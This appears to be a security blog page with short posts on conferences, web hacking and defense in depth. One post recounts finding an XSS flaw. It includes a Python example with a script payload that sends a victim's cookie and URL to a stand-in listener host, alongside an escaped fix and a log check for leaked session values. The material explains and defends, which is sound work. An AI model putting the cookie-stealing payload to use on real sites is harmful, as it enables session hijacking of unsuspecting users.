Definitely worth a read for those of you that think Ubuntu is a Linux distribution.
tcpdump -i eth0 > /dev/audio
Awesome! Credit to zeroday and sound of traffic project.
There is something very big going on in the security world. It is rare to see things pushed forward quite this fast. I'm talking about the latest advances in web application security. I'm calling it Web Hacking 2.0 (gettit?).
Continue reading "Web Hacking 2.0 - This is BIG"
ITWeb will be holding their 2007 Security Summit. The keynotes are Bruce Schneier and Phil Zimmerman. The best part is, three of our abstracts were accepted. Nithen, Yusuf and Johann will be presenting.
I sat up one night trying to figure out what I would say to Schneier. He is one of the reasons I got into security as a job. I remember having just finished my honours degree (our first postgrad degree before a Masters) and reading Secrets and Lies. It made me realise I could turn my hobby into a job. How does one meet a 'celebrity' and not come across as a gushing teen ready to part with her bra? I don't know, but I am going to try hard to take him out to dinner.
So, if you will be near SA, or are prepared to fly here, come to the ITWeb Security Summit to watch us present :)
This week I was reviewing a security product and discovered a rather serious XSS in their web console. When I highlighted this to the product's technical team, they claimed it was a vulnerability in IIS and not their product. It was rather silly of them to claim that outputting JavaScript was the fault of the web server. However, it did highlight two interesting facts about XSS to me: An alert box displaying 'XSS' or unintelligible session details means very little to many people who should know better. You need to have a canned, high-level explanation of what the dangers of an XSS really are.
A quick and easy demo, which I put here mostly for my own memory, is to just change the window location to point to a machine where you have set up a netcat listener, with the session details and URL appended to the request. If you want to be stealthy, you can use a hidden iframe.
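An added example (not code from the original post) putting the two points above side by side: the reflecting handler that makes the demo possible next to the output-encoded fix that lives in the application, not in IIS, plus a small log check that flags the demo's footprint, a request carrying session-looking values in its query string. The handler names, the listener hostname and the three-field log format are constructed for the example.

```python
import html
import re
from urllib.parse import urlparse, parse_qs

# Constructed payload of the kind the post describes: send the browser to a
# listener with the session cookie and the current URL appended to the request.
DEMO_PAYLOAD = ('<script>location="http://listener.example:4444/?c="'
                '+document.cookie+"&u="+location.href</script>')


def render_unsafe(username: str) -> str:
    """Vulnerable (hypothetical) console page: reflects the parameter straight
    into the HTML, which is the application's bug, not the web server's."""
    return f"<h1>Welcome {username}</h1>"


def render_safe(username: str) -> str:
    """Fixed version: HTML-encode at the point of output, so the payload is
    shown as text instead of executed."""
    return f"<h1>Welcome {html.escape(username, quote=True)}</h1>"


# Query-string keys or values that look like session material.
_SESSION_MARKERS = re.compile(r"(sess|sid|token|cookie|phpsessid|aspsessionid)", re.I)


def flag_session_leaks(log_lines):
    """Detection side: return request URLs whose query string carries
    session-looking material, the footprint left by the demo above.
    Assumed (constructed) log format: '<timestamp> <client> <url>'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        url = parts[2]
        query = parse_qs(urlparse(url).query)
        for key, values in query.items():
            if _SESSION_MARKERS.search(key) or _SESSION_MARKERS.search(values[0]):
                hits.append(url)
                break
    return hits


# Constructed sample proxy log: one ordinary request, one exfil request.
SAMPLE_LOG = [
    "2007-03-01T10:00:00 10.0.0.5 http://console.example/index?page=1",
    "2007-03-01T10:00:01 10.0.0.5 http://listener.example:4444/?c=ASPSESSIONID=ABC123&u=http://console.example/index",
    "2007-03-01T10:00:02 10.0.0.7 http://console.example/logout",
]
```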
RSnake has put up a really great write-up entitled, Death by a 1000 cuts. It describes how a series of minor security issues can be combined to form a very serious attack.
I spend most of my time dealing with security operational issues, where sometimes these sorts of minor issues are where I have to make concessions to get the big stuff done. I think this is a really great example that we security people need to take to developers and IT operational staff to show them why defense-in-depth is necessary.
Continue reading "A Case Study for Defense in Depth"